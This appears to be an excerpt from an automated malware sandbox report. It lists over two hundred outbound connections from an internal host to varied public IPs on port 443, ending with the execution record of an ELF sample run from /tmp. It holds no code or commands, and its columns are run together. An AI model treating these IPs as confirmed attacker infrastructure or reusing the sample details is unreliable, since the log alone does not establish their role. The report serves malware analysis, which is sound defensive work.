                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24602192.168.2.135298488.37.61.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24603192.168.2.133737665.205.85.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24604192.168.2.1358582128.108.6.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24605192.168.2.133428224.83.156.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24606192.168.2.1336304100.234.33.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24607192.168.2.1351564117.119.250.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24608192.168.2.1347434181.83.251.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24609192.168.2.133863294.49.73.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24610192.168.2.1336202143.185.89.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24611192.168.2.133956085.60.60.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24612192.168.2.1341528136.250.158.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24613192.168.2.1359434154.36.95.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24614192.168.2.134143072.35.165.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24615192.168.2.1342394198.160.18.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24616192.168.2.1357820175.205.27.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24617192.168.2.1348428166.23.40.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24618192.168.2.135510058.232.45.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24619192.168.2.133579647.243.29.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24620192.168.2.133287484.209.146.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24621192.168.2.133369882.13.238.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24622192.168.2.1333536205.8.129.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24623192.168.2.1349974192.254.228.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24624192.168.2.133747441.84.243.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24625192.168.2.134350241.67.98.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24626192.168.2.1355734153.98.105.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24627192.168.2.135825671.35.7.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24628192.168.2.1349554129.201.67.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24629192.168.2.1356284179.25.147.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24630192.168.2.134177663.65.193.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24631192.168.2.1343100134.182.193.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24632192.168.2.1354510126.247.33.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24633192.168.2.1346324184.137.20.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24634192.168.2.134911817.146.49.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24635192.168.2.134400631.254.7.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24636192.168.2.134064269.97.237.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24637192.168.2.13520265.21.109.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24638192.168.2.1350202174.76.255.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24639192.168.2.133819051.19.1.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24640192.168.2.1338358175.168.137.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24641192.168.2.1347180141.10.136.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24642192.168.2.1341078144.49.147.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24643192.168.2.1339534166.249.240.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24644192.168.2.136043085.196.177.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24645192.168.2.13427565.222.108.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24646192.168.2.1339526186.133.120.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24647192.168.2.1345886181.252.78.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24648192.168.2.134325882.64.79.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24649192.168.2.1339196168.127.45.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24650192.168.2.135368241.216.112.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24651192.168.2.134917831.53.12.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24652192.168.2.1338652201.88.126.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24653192.168.2.1353492133.100.122.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24654192.168.2.1343586187.15.253.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24655192.168.2.135729042.218.171.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24656192.168.2.134426692.98.251.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24657192.168.2.1357366110.171.175.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24658192.168.2.1334046101.28.19.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24659192.168.2.1355322147.215.20.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24660192.168.2.1360570191.154.91.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24661192.168.2.1351010219.179.13.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24662192.168.2.133350699.132.206.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24663192.168.2.1358760201.159.215.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24664192.168.2.134613864.153.97.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24665192.168.2.1338032199.65.91.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24666192.168.2.1333732106.143.160.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24667192.168.2.1335110147.249.239.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24668192.168.2.1349426112.178.35.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24669192.168.2.1335580190.193.56.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24670192.168.2.1348292134.201.138.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24671192.168.2.133696692.127.135.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24672192.168.2.135811044.115.31.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24673192.168.2.1345462171.242.51.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24674192.168.2.1333386105.181.102.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24675192.168.2.133796636.86.64.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24676192.168.2.1342298133.234.174.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24677192.168.2.1352048173.201.39.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24678192.168.2.1359720171.250.51.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24679192.168.2.134147682.148.209.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24680192.168.2.1342904203.44.232.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24681192.168.2.135271259.199.10.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24682192.168.2.136059434.149.35.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24683192.168.2.1349566141.213.18.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24684192.168.2.13374085.192.69.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24685192.168.2.133874427.37.131.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24686192.168.2.133953244.82.9.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24687192.168.2.134616260.64.221.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24688192.168.2.1357468143.51.248.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24689192.168.2.134795427.99.110.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24690192.168.2.1336996115.248.174.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24691192.168.2.133434099.87.120.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24692192.168.2.1335200111.26.17.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24693192.168.2.135505088.247.201.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24694192.168.2.1337218149.242.37.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24695192.168.2.135331454.13.26.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24696192.168.2.133970417.113.180.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24697192.168.2.134768837.13.67.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24698192.168.2.1346384213.133.172.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24699192.168.2.1332816179.97.60.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24700192.168.2.133762873.85.255.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24701192.168.2.1349320159.152.51.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24702192.168.2.1350888122.29.190.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24703192.168.2.1354996189.83.99.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24704192.168.2.1359536150.16.142.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24705192.168.2.134226062.162.126.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24706192.168.2.1334980198.119.186.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24707192.168.2.1337414164.15.63.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24708192.168.2.1340090152.93.159.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24709192.168.2.1348194119.122.113.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24710192.168.2.135490861.219.84.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24711192.168.2.1349728116.214.229.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24712192.168.2.135006014.181.238.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24713192.168.2.133936817.110.241.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24714192.168.2.1334982155.122.59.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24715192.168.2.1356122148.35.135.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24716192.168.2.135891862.162.44.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24717192.168.2.134361236.78.26.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24718192.168.2.1359454207.90.250.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24719192.168.2.1339954108.55.230.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24720192.168.2.134000836.126.4.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24721192.168.2.1352698152.126.188.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24722192.168.2.1348984153.146.214.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24723192.168.2.134620292.82.253.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24724192.168.2.134734074.255.21.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24725192.168.2.135581085.186.135.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24726192.168.2.1340536163.109.69.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24727192.168.2.1351476144.206.206.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24728192.168.2.1347144149.74.51.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24729192.168.2.1353972161.124.34.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24730192.168.2.134490818.125.106.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24731192.168.2.1354264182.141.25.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24732192.168.2.135239032.60.157.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24733192.168.2.1333622181.107.3.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24734192.168.2.1358496172.253.66.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24735192.168.2.1350224160.44.4.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24736192.168.2.135787666.24.156.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24737192.168.2.1333544134.132.28.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24738192.168.2.134045069.31.151.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24739192.168.2.1335624157.23.84.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24740192.168.2.1342862208.96.198.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24741192.168.2.1357026173.19.78.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24742192.168.2.134480077.39.120.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24743192.168.2.133963444.132.214.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24744192.168.2.1337330102.14.203.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24745192.168.2.1337202219.199.119.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24746192.168.2.1336390134.184.121.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24747192.168.2.134798470.211.167.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24748192.168.2.13444545.70.190.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24749192.168.2.133864231.68.239.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24750192.168.2.1340832213.168.142.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24751192.168.2.135090672.218.145.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24752192.168.2.134904079.45.194.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24753192.168.2.1339124163.88.86.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24754192.168.2.135949648.167.149.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24755192.168.2.133850883.141.165.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24756192.168.2.1354326178.242.62.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24757192.168.2.1343834192.18.125.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24758192.168.2.1341178111.249.99.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24759192.168.2.133685860.62.142.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24760192.168.2.134330423.42.173.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24761192.168.2.1339990122.102.103.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24762192.168.2.1345970198.123.196.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24763192.168.2.1358106128.94.222.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24764192.168.2.1343198192.35.25.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24765192.168.2.1341230109.201.189.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24766192.168.2.1350188163.228.119.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24767192.168.2.1357498144.9.143.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24768192.168.2.1337214161.21.58.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24769192.168.2.1345720187.34.241.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24770192.168.2.1347128143.175.117.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24771192.168.2.1345378130.33.173.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24772192.168.2.1338372131.81.119.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24773192.168.2.133593491.203.113.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24774192.168.2.1348176196.176.221.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24775192.168.2.1357352160.24.7.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24776192.168.2.1359656198.46.193.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24777192.168.2.1352572188.102.165.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24778192.168.2.1347900149.21.49.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24779192.168.2.1359098187.215.63.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24780192.168.2.1335960198.140.65.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24781192.168.2.1354566156.157.95.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24782192.168.2.1332990156.220.161.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24783192.168.2.1345922171.63.198.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24784192.168.2.1334382208.81.89.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24785192.168.2.135879437.203.191.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24786192.168.2.1358228140.167.188.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24787192.168.2.135963432.24.14.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24788192.168.2.1335298117.199.83.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24789192.168.2.1339580112.96.200.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24790192.168.2.135854083.152.39.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24791192.168.2.1341626145.208.112.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24792192.168.2.133670017.201.206.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24793192.168.2.1351544181.124.193.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24794192.168.2.135445257.57.47.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24795192.168.2.135889076.239.37.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24796192.168.2.1347070139.122.193.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24797192.168.2.1336860137.14.87.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24798192.168.2.133404285.100.160.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24799192.168.2.135837264.205.72.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24800192.168.2.1347104100.31.95.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24801192.168.2.133771237.133.251.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24802192.168.2.135638224.4.213.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24803192.168.2.1356430130.252.233.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24804192.168.2.135283420.197.109.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24805192.168.2.1348244105.131.102.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24806192.168.2.1353516185.246.213.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24807192.168.2.1351492130.13.219.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24808192.168.2.1356972109.219.90.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24809192.168.2.1359780120.20.139.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24810192.168.2.135691240.151.156.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24811192.168.2.1348734103.76.190.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24812192.168.2.1337226193.47.22.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24813192.168.2.134777284.165.225.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24814192.168.2.1350250182.69.245.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24815192.168.2.1344770178.106.90.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24816192.168.2.1357598179.56.20.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24817192.168.2.1354622146.163.166.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24818192.168.2.133665635.254.216.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24819192.168.2.133678442.213.102.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24820192.168.2.1333452210.40.42.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24821192.168.2.133460657.213.203.119443
                                                TimestampBytes transferredDirectionData


                                                System Behavior

                                                Start time (UTC):17:23:50
                                                Start date (UTC):12/01/2024
                                                Path:/tmp/zogsXPGVgB.elf
                                                Arguments:/tmp/zogsXPGVgB.elf
                                                File size:5388968 bytes
